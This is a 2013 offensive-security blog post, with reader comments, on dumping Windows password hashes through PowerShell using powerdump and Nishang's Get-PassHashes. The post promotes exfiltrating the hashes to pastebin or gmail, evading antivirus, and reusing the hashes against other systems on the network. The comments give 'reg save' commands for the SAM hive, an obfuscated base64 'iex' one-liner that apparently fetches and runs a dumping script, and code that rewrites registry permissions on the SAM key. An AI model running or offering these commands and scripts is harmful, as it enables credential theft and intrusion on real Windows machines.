Wednesday, May 29, 2013

Poshing the hashes part 2 - Dump Windows password hashes with PowerShell


UPDATE: As mentioned here, even after KB2871997, you could still 'Posh' the SID-500-Administrator's hashes.

Ok, this should have been the first part. Read my previous post, Posing the hashes: Using PowerShell to play with hashes, about what we can do _after_ dumping password hashes. I got many questions on how to dump hashes using powershell before using them. So here is a quick post about dumping password hashes using powershell:

There is a powershell script available in metasploit framework called powerdump which could be used to dump hashes from a Windows machine using powershell. It is written by David Kennedy. Lets see it in action.



What just happened? We need SYSTEM privs to use powerdump on a Windows 7 system, even an elevated Administrator privilege is not sufficient.

UPDATE (29/06/2014):  Get-PassHashes does not require SYSTEM privs anymore for dumping hashes.
(The code post by SuperGQ in comments has been used with modifications to achieve this)

Now, we can have SYSTEM privilege after getting admin using a number of methods. My favorite is using powershell. The Enable-DuplicateToken script in Nishang written by Niklas Goude could be used. Using this script we can use SYSTEM token from lsass process in current powershell thread. So, if we use Enable-Duplicate token and then call powerdump from the same thread we can dump password hashes from a Windows 7 machine without using any "third party" tool.

I have combined the scripts and created a payload for Nishang, Get-PassHashes.


Get-Passhashes elevates itself to SYSTEM (need Admin privs) and dumps password hashes. It is capable of exfiltrating the hashes to pastebin/gmail/tinypaste. This "exfiltration" thing has been improved in Nishang and would be included with many payloads very soon. For now, lets see Get-PassHashes in action.

Nice! We have the hashes. Now as per my other post, we can use these hashes with Windows Credential Editor and have much more fun with target and other Windows systems in the network.


As with almost every other payload/script in powershell, no AV etc. is bothered with this whole thing.

Get-PassHashes could be obtained from Nishang repository. Please checkout the repository. Existing users, please update your repos.

UPDATE:

Did Micorsoft broke Poshing the hashes with KB2871997 and KB2928120. This blog post disagrees.
http://www.pwnag3.com/2014/05/what-did-microsoft-just-break-with.html
Hope you enjoyed this, share your thoughts using the comments below. As always, please feel free for bugs, feedback and feature requests.

12 comments:

  1. This comment has been removed by the author.

    ReplyDelete
  2. So it's possible to dump hashes with SYSTEM privileges, but what for? It's possible to dump credentials from all enabled security providers with administrator privileges (you could get cleartext passwords of logged on users and hashes of all the other users)

    ReplyDelete
    Replies
    1. Yeah, but I found this to be stealthier and easier than other methods known to me.

      Delete
  3. No SYSTEM required. As Administrator:

    "reg save HKLM\SAM SAM.reg"

    "reg save HKLM\SYSTEM SYSTEM.reg"

    bkhive, samdump2, etc.

    ReplyDelete
    Replies
    1. Thanks. Methods known to me which make use of powershell for dumping hashes require SYSTEM. I am talking about that in the post.

      Delete
  4. Hello, I really enjoy your blog and thought I'd give back by providing a method to dump local password hashes using PowerShell, without SYSTEM.

    This script does require an elevated privileged command prompt.

    @powershell -ep bypass -c "iex $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String('y0ytUNDwSy3X9U/KSk0uUfBLLdELT01yzslMzSvR1HPJL8/LyU9MCS4pysxL11DPKCkpsNLXT8os0cup1DdMKgt1DS5R1+TlAgA=')))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();"

    Enjoy!

    ReplyDelete
    Replies
    1. Thank you! But the Powerdump script, which is being downloaded in the command you gave, needs system to work on Windows 7.

      Delete
    2. I modified the Powerdump script to only require Administrative access.

      Take a closer look... here's the relevant snippet. Tested as working (many times) on Win XP, 7, and 8.

      if (-NOT ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator"))
      {
      Write-Warning "Script requires elevated or administrative privileges."
      Return
      } else {
      $rule = New-Object System.Security.AccessControl.RegistryAccessRule (
      [System.Security.Principal.WindowsIdentity]::GetCurrent().Name,
      "FullControl",
      [System.Security.AccessControl.InheritanceFlags]"ObjectInherit,ContainerInherit",
      [System.Security.AccessControl.PropagationFlags]"None",
      [System.Security.AccessControl.AccessControlType]"Allow")
      $key = [Microsoft.Win32.Registry]::LocalMachine.OpenSubKey(
      "SAM\SAM\Domains",
      [Microsoft.Win32.RegistryKeyPermissionCheck]::ReadWriteSubTree,
      [System.Security.AccessControl.RegistryRights]::ChangePermissions)
      $acl = $key.GetAccessControl()
      $acl.SetAccessRule($rule)
      $key.SetAccessControl($acl)

      DumpHashes

      }

      Enjoy!

      Delete
    3. Why SYSTEM was required is by default only SYSTEM has rights to the SAM\SAM\Domains hive. This modification grants the current user rights to this HIVE in an inherited manner and thus negates the need to be running as SYSTEM. As an additional improvement, I've considered removing said rights after dumping the hashes. Use SetACL studio to view/confirm before and after permission changes.

      Delete
    4. Thank you, it works :)

      Would you like to contribute the changes to Nishang? It can certainly use a hashdump script of its own - credit will obviously go to you and Dave. Where can I drop you an email? or contact me on nikhil [dot] uitrgpv [at] gmail.com

      Delete
    5. Am I doing something wrong? This script dumps hashes but they are incorrect on Win 2008 R2?

      Delete
    6. I don't have access to a Server 2008. But checked in on a Server 2012 R2, it dumps the hashes correctly. You may be facing problems in "passing" the hash.

      Delete